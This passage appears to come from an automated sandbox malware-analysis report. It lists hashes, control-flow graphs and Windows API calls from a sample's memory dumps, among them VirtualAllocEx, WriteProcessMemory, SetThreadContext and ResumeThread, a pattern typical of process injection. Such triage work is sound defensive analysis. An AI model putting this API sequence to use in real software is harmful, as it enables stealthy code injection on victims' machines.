                    • Opcode ID: c79d423ab4379f5834d60e74c526484b25e8466c8a8a86eb659f8049a801a243
                    • Instruction ID: 8f61960974df731b596bd8e9294f6f81bb8b52bca0704db5e10a85666cffdc4d
                    • Opcode Fuzzy Hash: c79d423ab4379f5834d60e74c526484b25e8466c8a8a86eb659f8049a801a243
                    • Instruction Fuzzy Hash: FD915971D003198FEF54EFA9C841BEEBBB2BB48314F0485AAD859A7240DB749985CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 507 6aa432c-6aa4399 509 6aa439b-6aa43a5 507->509 510 6aa43d2-6aa43f2 507->510 509->510 511 6aa43a7-6aa43a9 509->511 517 6aa442b-6aa447d MoveFileExA 510->517 518 6aa43f4-6aa43fe 510->518 512 6aa43ab-6aa43b5 511->512 513 6aa43cc-6aa43cf 511->513 515 6aa43b9-6aa43c8 512->515 516 6aa43b7 512->516 513->510 515->515 519 6aa43ca 515->519 516->515 524 6aa447f-6aa4485 517->524 525 6aa4486-6aa44b7 517->525 518->517 520 6aa4400-6aa4402 518->520 519->513 522 6aa4404-6aa440e 520->522 523 6aa4425-6aa4428 520->523 526 6aa4412-6aa4421 522->526 527 6aa4410 522->527 523->517 524->525 531 6aa44b9-6aa44bd 525->531 532 6aa44c7-6aa44cb 525->532 526->526 529 6aa4423 526->529 527->526 529->523 531->532 533 6aa44bf 531->533 534 6aa44db 532->534 535 6aa44cd-6aa44d1 532->535 533->532 537 6aa44dc 534->537 535->534 536 6aa44d3 535->536 536->534 537->537
                    APIs
                    • MoveFileExA.KERNEL32(?,?,?), ref: 06AA446D
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 704649b6457fdd9edebfc8b1f1f2dc87d7812ce7da6018645456edf7fc8649b0
                    • Instruction ID: 43d85c60a22ffe11260c2d022d66bd938819f67443cea2a4f4ed8a551e2d4573
                    • Opcode Fuzzy Hash: 704649b6457fdd9edebfc8b1f1f2dc87d7812ce7da6018645456edf7fc8649b0
                    • Instruction Fuzzy Hash: 4F514571D007599FDB50DFA9C8817AEFBF1FB48314F14862AE855AB284D7B48886CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 538 6aa4338-6aa4399 540 6aa439b-6aa43a5 538->540 541 6aa43d2-6aa43f2 538->541 540->541 542 6aa43a7-6aa43a9 540->542 548 6aa442b-6aa447d MoveFileExA 541->548 549 6aa43f4-6aa43fe 541->549 543 6aa43ab-6aa43b5 542->543 544 6aa43cc-6aa43cf 542->544 546 6aa43b9-6aa43c8 543->546 547 6aa43b7 543->547 544->541 546->546 550 6aa43ca 546->550 547->546 555 6aa447f-6aa4485 548->555 556 6aa4486-6aa44b7 548->556 549->548 551 6aa4400-6aa4402 549->551 550->544 553 6aa4404-6aa440e 551->553 554 6aa4425-6aa4428 551->554 557 6aa4412-6aa4421 553->557 558 6aa4410 553->558 554->548 555->556 562 6aa44b9-6aa44bd 556->562 563 6aa44c7-6aa44cb 556->563 557->557 560 6aa4423 557->560 558->557 560->554 562->563 564 6aa44bf 562->564 565 6aa44db 563->565 566 6aa44cd-6aa44d1 563->566 564->563 568 6aa44dc 565->568 566->565 567 6aa44d3 566->567 567->565 568->568
                    APIs
                    • MoveFileExA.KERNEL32(?,?,?), ref: 06AA446D
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: f2de09dd5833c4320d6d8697abb4a6db2ed601fed778d1bb07f5b28af4b73b89
                    • Instruction ID: 77749ddeef4d8f657dd6b6b8f07271e834754e618699117b2d290f9dfd5294f4
                    • Opcode Fuzzy Hash: f2de09dd5833c4320d6d8697abb4a6db2ed601fed778d1bb07f5b28af4b73b89
                    • Instruction Fuzzy Hash: 42516371D007599FDB50EFA9C8817AEFBF1FB48310F14852AE855AB280D7B49881CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 569 1770c84-1770cef 571 1770d43-1770d8f LoadLibraryA 569->571 572 1770cf1-1770d16 569->572 575 1770d91-1770d97 571->575 576 1770d98-1770dc9 571->576 572->571 577 1770d18-1770d1a 572->577 575->576 582 1770dcb-1770dcf 576->582 583 1770dd9 576->583 579 1770d3d-1770d40 577->579 580 1770d1c-1770d26 577->580 579->571 584 1770d2a-1770d39 580->584 585 1770d28 580->585 582->583 586 1770dd1 582->586 588 1770dda 583->588 584->584 587 1770d3b 584->587 585->584 586->583 587->579 588->588
                    APIs
                    • LoadLibraryA.KERNELBASE(?), ref: 01770D7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 27a221f694b298e543fd9d2f333fe5c833fc91ce86acd794c792aa556cfbc6a2
                    • Instruction ID: b85815bdabf5b70e83419b1af8b252c6ad4e4dae12167b1471cf7b9580e81f40
                    • Opcode Fuzzy Hash: 27a221f694b298e543fd9d2f333fe5c833fc91ce86acd794c792aa556cfbc6a2
                    • Instruction Fuzzy Hash: 644132B0D003589FDF10CFA9C98079EFBF1EB4A314F14852AE819AB284D774A885CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 589 17701b0-1770cef 592 1770d43-1770d8f LoadLibraryA 589->592 593 1770cf1-1770d16 589->593 596 1770d91-1770d97 592->596 597 1770d98-1770dc9 592->597 593->592 598 1770d18-1770d1a 593->598 596->597 603 1770dcb-1770dcf 597->603 604 1770dd9 597->604 600 1770d3d-1770d40 598->600 601 1770d1c-1770d26 598->601 600->592 605 1770d2a-1770d39 601->605 606 1770d28 601->606 603->604 607 1770dd1 603->607 609 1770dda 604->609 605->605 608 1770d3b 605->608 606->605 607->604 608->600 609->609
                    APIs
                    • LoadLibraryA.KERNELBASE(?), ref: 01770D7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 8691e6721b6c8877693eb75f06ebac2cb9c56ce0a27f50e2cdbbf5c40b8073f7
                    • Instruction ID: f19691770927c10d6a9a141ae02c56a21e8fe77241bb01aa5fcbe8e20e3e6cfc
                    • Opcode Fuzzy Hash: 8691e6721b6c8877693eb75f06ebac2cb9c56ce0a27f50e2cdbbf5c40b8073f7
                    • Instruction Fuzzy Hash: F44122B0D003189FDB14CFA9D88579EFBF5EB49314F14852AE819AB384D7B4A885CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 610 6aac6d9-6aac6dd 611 6aac6df-6aac72e 610->611 612 6aac6a0-6aac6a1 610->612 615 6aac73e-6aac77d WriteProcessMemory 611->615 616 6aac730-6aac73c 611->616 618 6aac77f-6aac785 615->618 619 6aac786-6aac7b6 615->619 616->615 618->619
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AAC770
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 4aa5efed0fc6ca32e4e379d3e7045fc66f26c8f404de7ad6e44217b1552585bf
                    • Instruction ID: fd92239c931e94c5d34a36f2cb11eb0f9d70adecbbb7555435014f79bdfe520e
                    • Opcode Fuzzy Hash: 4aa5efed0fc6ca32e4e379d3e7045fc66f26c8f404de7ad6e44217b1552585bf
                    • Instruction Fuzzy Hash: 5C2139759003199FDB50DFA9C881BEEBBF5FF48324F40882AE919A7240C774A944DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 623 6aac6e0-6aac72e 625 6aac73e-6aac77d WriteProcessMemory 623->625 626 6aac730-6aac73c 623->626 628 6aac77f-6aac785 625->628 629 6aac786-6aac7b6 625->629 626->625 628->629
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AAC770
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 912fadc78b042a42b421f00eb5ea167031924b7dd8a9263fc7687c6773f9b405
                    • Instruction ID: 1c86c004f4655ba1c1ce8af120e8ed3b1e157cf03c20cc6ac26abc0d3c40a176
                    • Opcode Fuzzy Hash: 912fadc78b042a42b421f00eb5ea167031924b7dd8a9263fc7687c6773f9b405
                    • Instruction Fuzzy Hash: 28212A759003199FCB50DFA9C884BDEBBF5FF48314F54882AE919A7240C7789944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 6aac521-6aac573 636 6aac583-6aac5b3 SetThreadContext 633->636 637 6aac575-6aac581 633->637 639 6aac5bc-6aac5ec 636->639 640 6aac5b5-6aac5bb 636->640 637->636 640->639
                    APIs
                    • SetThreadContext.KERNELBASE(?,00000000), ref: 06AAC5A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: 0d4be07c7ebcd57723abb36579407cedd7f4e0b4fa108b9b5eab9eb7601187d3
                    • Instruction ID: b797b2139c99b8af704c07b3588c9b18a16c43b9ab6a5d8cf2febfa7551f26fe
                    • Opcode Fuzzy Hash: 0d4be07c7ebcd57723abb36579407cedd7f4e0b4fa108b9b5eab9eb7601187d3
                    • Instruction Fuzzy Hash: 4C2148719003099FDB50DFA9C4847EEBBF8EB48324F54882AE419A7240DB78A945CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 06AA18B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: KernelObjectSecurity
                    • String ID:
                    • API String ID: 3015937269-0
                    • Opcode ID: e24e3f15e21bfe90d530a2b5f7d0a72521800eea5bb8cb28903511f3b86f7e85
                    • Instruction ID: b4d07883ff712c4fde4414747769a63bc2cbc05ff5b8733416851cee1b665cb4
                    • Opcode Fuzzy Hash: e24e3f15e21bfe90d530a2b5f7d0a72521800eea5bb8cb28903511f3b86f7e85
                    • Instruction Fuzzy Hash: B52139B5D002099FDB10CFA9C585BEEBBF4EF48314F14852AD419A7340D778A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadContext.KERNELBASE(?,00000000), ref: 06AAC5A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: 39a5aae8b2925b3795568e2a7be0c87ed86b240c6b7067ab059f1c033670cef4
                    • Instruction ID: f9a3cf6369db4e0656d2363b1ecdccfb0f8f68d6e282572227927ced899a4dd8
                    • Opcode Fuzzy Hash: 39a5aae8b2925b3795568e2a7be0c87ed86b240c6b7067ab059f1c033670cef4
                    • Instruction Fuzzy Hash: 86213871D003099FDB50DFAAC4847EEBBF5EF48324F54882AD419A7240DB78AA44CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 06AA18B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: KernelObjectSecurity
                    • String ID:
                    • API String ID: 3015937269-0
                    • Opcode ID: 6ea177be8877fda827f60a72fcf89de248a005a9ddc6372bff320b24df03a439
                    • Instruction ID: c7bb3b5177a0218502e1a3e58aee353553d36fdc9c40e4f59673a4345604d90c
                    • Opcode Fuzzy Hash: 6ea177be8877fda827f60a72fcf89de248a005a9ddc6372bff320b24df03a439
                    • Instruction Fuzzy Hash: 172127B5D002099FCB10DFAAC585BEEBBF4EB48324F54882AD419A7340D778A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 01770FEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: c158be5ee89afc3dbcba08ecf124b9a32d9ded68ad19acc1b17e8e728a6cc9a0
                    • Instruction ID: 6b0d1079ebf5d0da02a049299f3eae66a31f910eebb104d8b65d52cd1350d1d0
                    • Opcode Fuzzy Hash: c158be5ee89afc3dbcba08ecf124b9a32d9ded68ad19acc1b17e8e728a6cc9a0
                    • Instruction Fuzzy Hash: A6211A759002499FCB10CF9AC484BDEFBF4FB48324F54842AE558A7650D374A544CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 01770FEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 7b6b23eebe942d7c3c246bf1a73731c2d44ce858c1a9884da1cf49e06a90a4eb
                    • Instruction ID: bdfa45cd89325ebdb02b220c48a4fb66037f37dfaa3012d223310a1b6d946068
                    • Opcode Fuzzy Hash: 7b6b23eebe942d7c3c246bf1a73731c2d44ce858c1a9884da1cf49e06a90a4eb
                    • Instruction Fuzzy Hash: 272106759002499FCB10CFAAC584BDEFBF5FB48320F14842AE458B7650D378A644CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AAC8F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 3180c11790c5e39c336897512bace987a9ac3fba34264fcf89cdb69aac2b23ea
                    • Instruction ID: 81d46c349dab88f4f9ac6b786b81e7fc8f40b3cd2c992bd9405865e4bce92650
                    • Opcode Fuzzy Hash: 3180c11790c5e39c336897512bace987a9ac3fba34264fcf89cdb69aac2b23ea
                    • Instruction Fuzzy Hash: 2C1147759003499FDB10DFA9C844BDFBBF9AF48324F14881AE919A7250C735A954CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AAC8F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: fc1cf8ab6b287298c8c7f70048c7c295c8296046349f258b66ea2e4cb5214b19
                    • Instruction ID: 4b41b95322a92a62a49cc7a167c2c2c20a87701655239d15b1b3278e89a69bc4
                    • Opcode Fuzzy Hash: fc1cf8ab6b287298c8c7f70048c7c295c8296046349f258b66ea2e4cb5214b19
                    • Instruction Fuzzy Hash: 861123769003499BCB10DFA9C844BEFBBF9EB48324F14882AE519A7250C775A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 63181137bde0883c2bd8160ff3d97386618120a477fc08d72de05efc3952b0ad
                    • Instruction ID: 7bc450e28aae28b39c69135937461fbcc50907a8b1cc0411a407fe3200363135
                    • Opcode Fuzzy Hash: 63181137bde0883c2bd8160ff3d97386618120a477fc08d72de05efc3952b0ad
                    • Instruction Fuzzy Hash: 4D1149B1D003488BDB14DFA9C8457DFFBF9AB88324F14882AC515A7640C779A944CF95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 75e4e2c080c9e9d71aaf47ecc591ff856617fe49ea1724e1a8793b65caa04e03
                    • Instruction ID: d3481e08484b66ea16fe8b189e3d3b26c4bf1a47d53ac523fc4553f0bd1a7b21
                    • Opcode Fuzzy Hash: 75e4e2c080c9e9d71aaf47ecc591ff856617fe49ea1724e1a8793b65caa04e03
                    • Instruction Fuzzy Hash: 36113A75D003088BDB14DFA9C4447DFFBF9AB88324F14882AC519B7640C775A944CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: f`.o$i;%o$j;%o$p45o$q;%o$s45o$t;%o$u;%o$u;%o$v;%o$w;%o$y`.o
                    • API String ID: 0-3406674395
                    • Opcode ID: ee20880c01d433ecf757169d7e9d7b4290ff472de1561df31a3a2ee573cb1dd9
                    • Instruction ID: 49bde7bd1b7d1a3aa544a6a3830c74a1f9d45af9c9f1c1691500f11f70c23d5b
                    • Opcode Fuzzy Hash: ee20880c01d433ecf757169d7e9d7b4290ff472de1561df31a3a2ee573cb1dd9
                    • Instruction Fuzzy Hash: C061E1B1F103258FE788AAA9DD6527E65E39BC8610F19942BE403EF344DB758C118BE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: f`.o$i;%o$j;%o$p45o$u;%o$u;%o$v;%o$w;%o
                    • API String ID: 0-863800063
                    • Opcode ID: fa00fe2939872e5e4b5185f3adfccd0bfd50d7c630a0d44fb22bfc2508e43654
                    • Instruction ID: cb998619a0c9b7dd7cfdfe02d1a41ee6123dd2589f47406c775fec387f0e45de
                    • Opcode Fuzzy Hash: fa00fe2939872e5e4b5185f3adfccd0bfd50d7c630a0d44fb22bfc2508e43654
                    • Instruction Fuzzy Hash: 65610675F143258FE788AA69DC552BE76E39B88210F19942BE413EF380DB758C018BE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: `~>l$IBl
                    • API String ID: 0-3926603690
                    • Opcode ID: 5dbe30cf750c96fa3c121410e4e550694ba87e49badc551c163f0bcf84b6109a
                    • Instruction ID: 526eceb088439c16b88bd8c6ba79342c4e8056da2781b8bd0be1c3b6d6725404
                    • Opcode Fuzzy Hash: 5dbe30cf750c96fa3c121410e4e550694ba87e49badc551c163f0bcf84b6109a
                    • Instruction Fuzzy Hash: 1F910176F042199BD754DFA9D8516AEBAF7ABC8310F19813BD902EF344EB349C068781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: `~>l$IBl
                    • API String ID: 0-3926603690
                    • Opcode ID: 885b0cfb9772eb1a9f7c4e9acc51b06a6444b4c2414dea4c4cebb46ff0fbb2d2
                    • Instruction ID: 2444e171467f8c0238d093699fcf401fbbbeaebd32d1f85fc0f6e8bea717c04c
                    • Opcode Fuzzy Hash: 885b0cfb9772eb1a9f7c4e9acc51b06a6444b4c2414dea4c4cebb46ff0fbb2d2
                    • Instruction Fuzzy Hash: BA810476F042289BD754DFA9D8542ADB6F7ABC8310F19913BD902EF344EB349D068B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: O
                    • API String ID: 0-878818188
                    • Opcode ID: e8e63ad091e3363bb9aa23b367ee27947cd53c77d138d555f86d3db711ed2146
                    • Instruction ID: 7cdee2d01036b7859c97fa234c4cc7f3753134227df108632685ec6feddb34ed
                    • Opcode Fuzzy Hash: e8e63ad091e3363bb9aa23b367ee27947cd53c77d138d555f86d3db711ed2146
                    • Instruction Fuzzy Hash: 074122327002468BDB04DA78CD195EEBBE7EFC93107199629E55ADB399EF348D038750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33f60f2d3dcec1f515a00d001ea85ff28ce2a6fb4ab8be0c95d39b1f42e868bd
                    • Instruction ID: 2d9050de4e8adc5e676702d77c2aa05f061239e711a1d43be2c2b757f8d75d2c
                    • Opcode Fuzzy Hash: 33f60f2d3dcec1f515a00d001ea85ff28ce2a6fb4ab8be0c95d39b1f42e868bd
                    • Instruction Fuzzy Hash: 16B11971F402148FD748DEA8DD916ADB6F3BBC8314B19952BE50BEB390DA74DC028B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a9f6204275507d4ad19e97ad112d7f9b892da2a087fcb1c70d9d8d467386798c
                    • Instruction ID: f8b25c5151fc68c91866aec3731fd4fe8d0d69d1510e9d9d296b966b242e1832
                    • Opcode Fuzzy Hash: a9f6204275507d4ad19e97ad112d7f9b892da2a087fcb1c70d9d8d467386798c
                    • Instruction Fuzzy Hash: 1FB11871F402148FD748DEA8DD556AEB6F3BBC8314B19552BE90AEB390DA74DC028B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8798e0ac8d32684d71caaba54c79e47ad2e8d48c46d3e34888b883cb27b52cfb
                    • Instruction ID: aeebbe26e7bb28e04f847eeaaf3d09ded1b007f0dadec1a58b77a60641af1d0f
                    • Opcode Fuzzy Hash: 8798e0ac8d32684d71caaba54c79e47ad2e8d48c46d3e34888b883cb27b52cfb
                    • Instruction Fuzzy Hash: 4AB12971F402148FD748DEA8DD556ADB6F3FBC8310B19952BE90AEB390DA74DC028B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01ce4a2bb8f4620fac69d6c17815cf7d7eb083b0065d64c8e65adbbe70cb7c04
                    • Instruction ID: 2c5557b6b777ab5d602a83b7a28124f3f811aea563810665052c9cdbe0d99eda
                    • Opcode Fuzzy Hash: 01ce4a2bb8f4620fac69d6c17815cf7d7eb083b0065d64c8e65adbbe70cb7c04
                    • Instruction Fuzzy Hash: 7E814B33F112604FDB04DA78DD162BA76D39BD9310759C16ADC1ADB389EA74CE0287C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87da48602b3b81b6932b0aec273d107d0514ebf45d9b465fc12ab028e853b98f
                    • Instruction ID: d98c0ba0bf8fd7c5e40f56369dccc6d344605eff0b780b06002008f18bbfca37
                    • Opcode Fuzzy Hash: 87da48602b3b81b6932b0aec273d107d0514ebf45d9b465fc12ab028e853b98f
                    • Instruction Fuzzy Hash: FE716933F512604FDB08D978DD1A27A72D39BE921075DC16ADC1AEB389EA74CE0287C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6dc2eae9b21304f4a00625afa5375277656a66abf565ed086b6b78f0b28dba5e
                    • Instruction ID: 3674576810c3e232a6a275fd835c7071b1f63477fa3358e6c04387df5ab1c5a6
                    • Opcode Fuzzy Hash: 6dc2eae9b21304f4a00625afa5375277656a66abf565ed086b6b78f0b28dba5e
